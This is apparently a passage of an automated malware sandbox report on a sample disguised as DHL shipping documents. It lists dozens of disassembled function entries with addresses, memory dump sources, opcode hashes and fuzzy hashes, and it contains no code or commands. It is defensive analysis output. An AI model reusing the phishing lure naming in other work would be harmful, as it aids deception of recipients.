                                                • Instruction Fuzzy Hash: E3C1333191DA4A8FE369DF28D4455B1B7E0FF97314B1046BED48EC3292EB25E84687C1
                                                Function 00007FFAACCF30F8 Relevance: .4, Instructions: 353COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4256ac8736f39ac0617e2c65e41adbed70b533c209e6b32ff14f41a454d2d61
                                                • Instruction ID: 8c4e4a3655bcf4d61f9c2f7309cb5804b85fdbaed7f16e1e08e695dd0bd12ad3
                                                • Opcode Fuzzy Hash: f4256ac8736f39ac0617e2c65e41adbed70b533c209e6b32ff14f41a454d2d61
                                                • Instruction Fuzzy Hash: 49B1B231509B06CFE759EF2CD495AB577E1FF96314B0846BAD08EC7592CA28E849C7C0
                                                Function 00007FFAACCD1C57 Relevance: .3, Instructions: 338COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f3880da3a8b8905e7aa426b7aae9b8767a7e628a381245dde3a727f465135f9
                                                • Instruction ID: bd3ff631eba5b14cc2bb2a3d26190932df702461e5301e2c006d7d8a868b28e9
                                                • Opcode Fuzzy Hash: 3f3880da3a8b8905e7aa426b7aae9b8767a7e628a381245dde3a727f465135f9
                                                • Instruction Fuzzy Hash: F1B19471A18B09CFEB98EF18C455A7877E1FF5A304B1440A9E44EC72A2DE21EC46CBC1
                                                Function 00007FFAACCDC3BB Relevance: .3, Instructions: 335COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7b7a024fc2b923ecaacec5360801f7df7545fe7f8a3a9125de2bf8b251f38120
                                                • Instruction ID: df1b915a52e0b7b4ba3f563c83eb809c959b8e35bd2ed6d677a3d1c643082bcb
                                                • Opcode Fuzzy Hash: 7b7a024fc2b923ecaacec5360801f7df7545fe7f8a3a9125de2bf8b251f38120
                                                • Instruction Fuzzy Hash: 46C19FB1A28B498FE794DF28C8557A9BBF0FF99304F1001AEE14DD3282CF3599858B45
                                                Function 00007FFAACCD8518 Relevance: .3, Instructions: 328COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b56d8aa147b4415799cd574ae966e03fb21692e56b1c1e04efd411421a00b5d
                                                • Instruction ID: 3175061c3717e09190f2d16124d02ccbe09652a68bafe2448e14502260866b5e
                                                • Opcode Fuzzy Hash: 5b56d8aa147b4415799cd574ae966e03fb21692e56b1c1e04efd411421a00b5d
                                                • Instruction Fuzzy Hash: C491453151DB458FE718DF58D8469B577E0EBA6321B10427ED44EC32A2DE25F84A87C1
                                                Function 00007FFAACCDBDC8 Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c07ecad95e9be31037ce928cdf8f57aff40042f3d4aca0d3fe4c4fd6f9b76be3
                                                • Instruction ID: 8248baa44e3eb356010bf290c39f80645f19ea7a562e9935f6ce67a261515af8
                                                • Opcode Fuzzy Hash: c07ecad95e9be31037ce928cdf8f57aff40042f3d4aca0d3fe4c4fd6f9b76be3
                                                • Instruction Fuzzy Hash: C3810371A0CA468FF34AAF2C94616B577D0EF86314B1481FAD08EC71A7DE28E84687C1
                                                Function 00007FFAACDE1309 Relevance: .3, Instructions: 257COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453977478.00007FFAACDE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacde0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1dca4674662a1d3cfaa095e6acedbe0b8c99feb40543f23a0a2ae2be7c114cd0
                                                • Instruction ID: 6d4ee101db82b7a4776ded28e7c7442a3cdca64c0eaeaf53e5392817cddac62c
                                                • Opcode Fuzzy Hash: 1dca4674662a1d3cfaa095e6acedbe0b8c99feb40543f23a0a2ae2be7c114cd0
                                                • Instruction Fuzzy Hash: 3771F361A0DBC98FEB56DB3888655A57FB1EF56300B0941EED09EC7193DB2CE849C381
                                                Function 00007FFAACCD2E88 Relevance: .2, Instructions: 234COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0def0f7d0f20d02447d2614acbfa37076731f309a9cc82c4e9baa02f91c1544d
                                                • Instruction ID: a0049cbd1e3b74e8177c212629d473e2482faaa8807a45f3fc34dd19e1dae74f
                                                • Opcode Fuzzy Hash: 0def0f7d0f20d02447d2614acbfa37076731f309a9cc82c4e9baa02f91c1544d
                                                • Instruction Fuzzy Hash: E661F561A1EE8A8FF7959B3C84557B677D1EF97210F48817BD40DC3286DE28E8498381
                                                Function 00007FFAACCD3130 Relevance: .2, Instructions: 229COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a217f060d3e4403b9ce890f4fb8209e8e4a419311257ad9e269b98f33e3d32d
                                                • Instruction ID: 59ea7e404c7371fc826b4f4d0143bd4073e51862d1bb3c878bdaedde336a1db9
                                                • Opcode Fuzzy Hash: 0a217f060d3e4403b9ce890f4fb8209e8e4a419311257ad9e269b98f33e3d32d
                                                • Instruction Fuzzy Hash: 62513A71B1DE0A8BF758AB1C944967573D1EF9A360F14427ED84EC3296DE24EC4742C1
                                                Function 00007FFAACCD3240 Relevance: .2, Instructions: 226COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 56dd47e3b279b66b89837db4fc1c5d9e59c15763f19f508ba790c72443b2ad04
                                                • Instruction ID: addcc986a24fa0dc5226ecba3fd1c6bd86d133a66c8cafdc11cf3977ff40834e
                                                • Opcode Fuzzy Hash: 56dd47e3b279b66b89837db4fc1c5d9e59c15763f19f508ba790c72443b2ad04
                                                • Instruction Fuzzy Hash: 24518471619B0A8FEB94DF1CC485AB573E1FF99318B1442BAD40EC7296DE24EC4687C1
                                                Function 00007FFAACCD2592 Relevance: .2, Instructions: 224COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9119e0c299512ac93c73214bf906fcf7fa889a755c085f8c0a4caa3778e82897
                                                • Instruction ID: 375083f497dde9730a5bfe3ad8a7682d60e100ecde2413e9e0cd15dec5eaaa70
                                                • Opcode Fuzzy Hash: 9119e0c299512ac93c73214bf906fcf7fa889a755c085f8c0a4caa3778e82897
                                                • Instruction Fuzzy Hash: 5251472180EA864FE35B9B64C4416B17FD5DF53310B1541BAD8DECB057E919EC5783C1
                                                Function 00007FFAACCD8180 Relevance: .2, Instructions: 218COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d02935bfa651662f79d497ad95aea5a1dba6c648b62a961e7fd21d5ed33ed4fb
                                                • Instruction ID: bf2a7c88437d50c7e1e131da0b65c03f83dadfa6352efad1a47384b785e5598d
                                                • Opcode Fuzzy Hash: d02935bfa651662f79d497ad95aea5a1dba6c648b62a961e7fd21d5ed33ed4fb
                                                • Instruction Fuzzy Hash: 6D61D4A1A1EBC58FE75ADB384815675BFE1EF5720030840EFC09EC76A7DD64D90A8782
                                                Function 00007FFAACCD35A8 Relevance: .2, Instructions: 208COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44a6d43e8aafae9f4833f0011aee420213c60398f3d9bbca4e3230447a622f57
                                                • Instruction ID: 19ced3f4db5b326f2760e7433bfd6c03843669fb76178793d89845af7be03871
                                                • Opcode Fuzzy Hash: 44a6d43e8aafae9f4833f0011aee420213c60398f3d9bbca4e3230447a622f57
                                                • Instruction Fuzzy Hash: 5C51AA71B1C71C8FAB589F5CA8461B977E1FB89721F10023FE84AC3251EA21F81786C6
                                                Function 00007FFAACCD4AA3 Relevance: .2, Instructions: 202COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cf541a9529535a386c1d91442eb59ace6912b7e173761982a23099f1888a130
                                                • Instruction ID: a28b77068c8aa24d157de7353be61367cff993dcf32dc80ac4fe56a93fee4fdb
                                                • Opcode Fuzzy Hash: 8cf541a9529535a386c1d91442eb59ace6912b7e173761982a23099f1888a130
                                                • Instruction Fuzzy Hash: 1061F970628E058FDB99EF28C095EA5B3E2FFA930075541A9D01EC76A6DF34F845CB81
                                                Function 00007FFAACCD1C80 Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b33aebc95e63b2d7b231d075cd56e79ff5c9b4077c884a107c050345463b5748
                                                • Instruction ID: 3719916885915ad74bfb592ef52e3dd65ef4aa5cba8e1258e29ad1d88e153e56
                                                • Opcode Fuzzy Hash: b33aebc95e63b2d7b231d075cd56e79ff5c9b4077c884a107c050345463b5748
                                                • Instruction Fuzzy Hash: 85516F70628A498FEB98EF2CC095B7673E1FF99314B5041BED44FC3696DE24E8468781
                                                Function 00007FFAACCDB800 Relevance: .2, Instructions: 184COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a3098071880bb2ea6d980cd34e7412fa33e4172f96f79ebfa838a13525a156c
                                                • Instruction ID: e3921c8913194a4b87a306b1bd8c2f53bc7e49436a9b8ce2412a3a4a5a4d3100
                                                • Opcode Fuzzy Hash: 7a3098071880bb2ea6d980cd34e7412fa33e4172f96f79ebfa838a13525a156c
                                                • Instruction Fuzzy Hash: 4651346270CF498FE359EB2C9869664BBE1EF9A75031541EFD00DC72A3DE21EC498381
                                                Function 00007FFAACCD9590 Relevance: .2, Instructions: 180COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 740e9350f5dfd321cc1539fe87e7f351276ef9ad23496df10be2d9e30a3b4726
                                                • Instruction ID: fadb34345fbfe5684cc6a89eeec3c45514ebdc8baa427857f0617baa005eead2
                                                • Opcode Fuzzy Hash: 740e9350f5dfd321cc1539fe87e7f351276ef9ad23496df10be2d9e30a3b4726
                                                • Instruction Fuzzy Hash: 8951547191EA4A8FF3289B2898555B177E0EF43310F048679E45EC7193EF29F84A83C8
                                                Function 00007FFAACCD31D0 Relevance: .2, Instructions: 175COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b7b30fb9f2b486763c3387d71e751e168ba36d8c31df97548d46d5cbc34a09d
                                                • Instruction ID: 52319b2a1f1c11681d98fcd7ac7b07a278fc09efa9d61d0d7bc3424dc3173b11
                                                • Opcode Fuzzy Hash: 8b7b30fb9f2b486763c3387d71e751e168ba36d8c31df97548d46d5cbc34a09d
                                                • Instruction Fuzzy Hash: 7941E371A1DE499FEB98EB2CC449A7577E0EF5A314B0000BEE01FC7693DE24E8498751
                                                Function 00007FFAACCFC958 Relevance: .2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9b2f38b0e7c4200455cc466a398f67c6db26657dc53ff9ece67354d2861dfba
                                                • Instruction ID: 3d83b5a7bab96f44bf65de7dda4e79d34dedac994c601c9a79bc39e7d8febccb
                                                • Opcode Fuzzy Hash: e9b2f38b0e7c4200455cc466a398f67c6db26657dc53ff9ece67354d2861dfba
                                                • Instruction Fuzzy Hash: E5415562B0C7498FE328AF2CA8465F97BD0EF96764F10417FE18D87193DD18B84A82C1
                                                Function 00007FFAACCD2F08 Relevance: .2, Instructions: 170COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b24d4c286e86ab5541398cb404e73c98bde53c12496e04fe2e82df2ee2d0b29
                                                • Instruction ID: 5bea911a09b4ad338a49890b510de2087d0d6646475c52da3b2f3926edfc0dfa
                                                • Opcode Fuzzy Hash: 1b24d4c286e86ab5541398cb404e73c98bde53c12496e04fe2e82df2ee2d0b29
                                                • Instruction Fuzzy Hash: 63414F3071DE098FE759EB2C9455A75B7D2EF9A31075441BEE00DC3296DE24E845C7C1
                                                Function 00007FFAACCF89D0 Relevance: .2, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e69e03fa7dcbfce08452cee1c34cbcb2e481405528860727cb03ef1a16b983a9
                                                • Instruction ID: 9b04f313f9cf87cb43f0d1e7fa0bb665dfddf7cd032c7bf7af2370a17ac1e593
                                                • Opcode Fuzzy Hash: e69e03fa7dcbfce08452cee1c34cbcb2e481405528860727cb03ef1a16b983a9
                                                • Instruction Fuzzy Hash: 7741C3A1A1DB498BFBA8DB28945577436D1EF9A304F0480BED00EC72C6DE24ED4AC7C1
                                                Function 00007FFAACCD35B8 Relevance: .2, Instructions: 156COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d3327de843df00510e693f1fccdf391bc576e82585b262d5426ece3d9f44c3e
                                                • Instruction ID: 2d1c138760327120d05cc95bf951b7a6cc30f9f14b280fd2570198c5bc435118
                                                • Opcode Fuzzy Hash: 5d3327de843df00510e693f1fccdf391bc576e82585b262d5426ece3d9f44c3e
                                                • Instruction Fuzzy Hash: 4641D87060D6558FE74AEF18C441AB97BE1EF46320B1441ADE04E87293CE29F847CBD5
                                                Function 00007FFAACCD31ED Relevance: .1, Instructions: 148COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4efba791794256fe8680111af0f96ab3c1a9d26a1b93e53f2258e2f709ab4d4b
                                                • Instruction ID: 15c475618508aefc7881c13cb0d267c97d5a237b6e5f7137df1031afeba25900
                                                • Opcode Fuzzy Hash: 4efba791794256fe8680111af0f96ab3c1a9d26a1b93e53f2258e2f709ab4d4b
                                                • Instruction Fuzzy Hash: E041D331718D098FEBD8EE6C9499AB973D1EF9931074441BAD41DC72A6EE24EC8687C0
                                                Function 00007FFAACCD89A8 Relevance: .1, Instructions: 147COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53b5e8b4ec7bc9a7baef9c2f9d7821534f0a03819b3fb5bd64e40045b9d2c62e
                                                • Instruction ID: 04e7b808c42adff4a200098a244455ae2c4f766744cafded7bab0d0358fd0ff5
                                                • Opcode Fuzzy Hash: 53b5e8b4ec7bc9a7baef9c2f9d7821534f0a03819b3fb5bd64e40045b9d2c62e
                                                • Instruction Fuzzy Hash: 6341CE3160E9098FF764AF58E8999B5B7E0EF57321B1401BAE04DC7193DA16EC82C3C4
                                                Function 00007FFAACCD4095 Relevance: .1, Instructions: 145COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41bc21631bc26fd0fe0b4e4afb89bb9e7cba3bdcedc9efabb6817a22acfa05ae
                                                • Instruction ID: 9fd6805488d4a4c0d58ca5beab5e85005f641ffc5b321fcd4589701f1be9aeef
                                                • Opcode Fuzzy Hash: 41bc21631bc26fd0fe0b4e4afb89bb9e7cba3bdcedc9efabb6817a22acfa05ae
                                                • Instruction Fuzzy Hash: 1741F6A1A1DB168BF768AF6CA4556B437D1EF46314F0481BAD00DC72D3DE28ED4983C5
                                                Function 00007FFAACDE1419 Relevance: .1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453977478.00007FFAACDE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacde0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a2ad54d0a13b2e5f3cb31038199c4479b9a035ae358277645fb71dc23599bcd
                                                • Instruction ID: b05baead983ffd2b9ec86dc1895acbfcea915a1f528c1f3765e283ec69460ab8
                                                • Opcode Fuzzy Hash: 7a2ad54d0a13b2e5f3cb31038199c4479b9a035ae358277645fb71dc23599bcd
                                                • Instruction Fuzzy Hash: AB410572A0DA898FEB56DB28C8544A97BB0FF56300B0541BED05FC7293DA29E849C781
                                                Function 00007FFAACCD7A0D Relevance: .1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b9eeb56d22c3c55422663d5ed599e87b12acfe8d4ad8232cae4c86a64e49b4f
                                                • Instruction ID: 54c2f4c3d012147becb39c3bfad114a4311d1d6a4724ecaeb1d87a8a935287ff
                                                • Opcode Fuzzy Hash: 1b9eeb56d22c3c55422663d5ed599e87b12acfe8d4ad8232cae4c86a64e49b4f
                                                • Instruction Fuzzy Hash: C2314CA1A2DE4A4FE359AB6C94455B1B7E0EF5921030041FFD05FC35D7DD18EC4A4382
                                                Function 00007FFAACCD9A62 Relevance: .1, Instructions: 136COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc20b14bef03af7934d6757bb1cfc9564f845ea89375ed39286a144edb3b650e
                                                • Instruction ID: 14e4488a94667a788b3babb0d6562cc741f747cc97dffc6794782dafea9be2dd
                                                • Opcode Fuzzy Hash: bc20b14bef03af7934d6757bb1cfc9564f845ea89375ed39286a144edb3b650e
                                                • Instruction Fuzzy Hash: 16310BD6A38E8A4BF299A76C84557F2B7D1EF5920074481FAD01FC36A7ED28F84583C1
                                                Function 00007FFAACCD07D0 Relevance: .1, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc93c1211597f1d1a3819c7f8cc2ea1cd10758353b83b443930792d9d5c5b3f9
                                                • Instruction ID: bb86cddbafe82875d15695f1bcfaf4c81fcc1e118773f0ba6d2e1aa5d4aa95b5
                                                • Opcode Fuzzy Hash: bc93c1211597f1d1a3819c7f8cc2ea1cd10758353b83b443930792d9d5c5b3f9
                                                • Instruction Fuzzy Hash: 1931F472B1C9494FE358EB2CD4156B9B7D6EF89350B1082BEE04EC32A7DE24A8464780
                                                Function 00007FFAACCD3168 Relevance: .1, Instructions: 131COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af8d89b60a9b3936bf1b7e151eeacd85572ee15376469a63afc2f2f3d802938d
                                                • Instruction ID: cfca790541e95b34e06d0ee34c9f573ca36319f548a6305866d6aca02fbb677e
                                                • Opcode Fuzzy Hash: af8d89b60a9b3936bf1b7e151eeacd85572ee15376469a63afc2f2f3d802938d
                                                • Instruction Fuzzy Hash: 4731383271D9098FE788EB2C9445675B3D2EF8B320B1446BAD40EC3257DE25EC4283C0
                                                Function 00007FFAACCD31F8 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d7250b52cb8de04c17e85b24320d9ac579ba66f676ced5afb34ac4943220d9a
                                                • Instruction ID: 458890f7caaccf6f1eeaf52710f2952889c5de1ef2d5ca9fd97956ce8db7f008
                                                • Opcode Fuzzy Hash: 8d7250b52cb8de04c17e85b24320d9ac579ba66f676ced5afb34ac4943220d9a
                                                • Instruction Fuzzy Hash: D631E821B0EE0A8FFBA5AB5C649977523C1EF6B721B00417BD40DCB296DD15EC8683C0
                                                Function 00007FFAACCD9B7C Relevance: .1, Instructions: 125COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
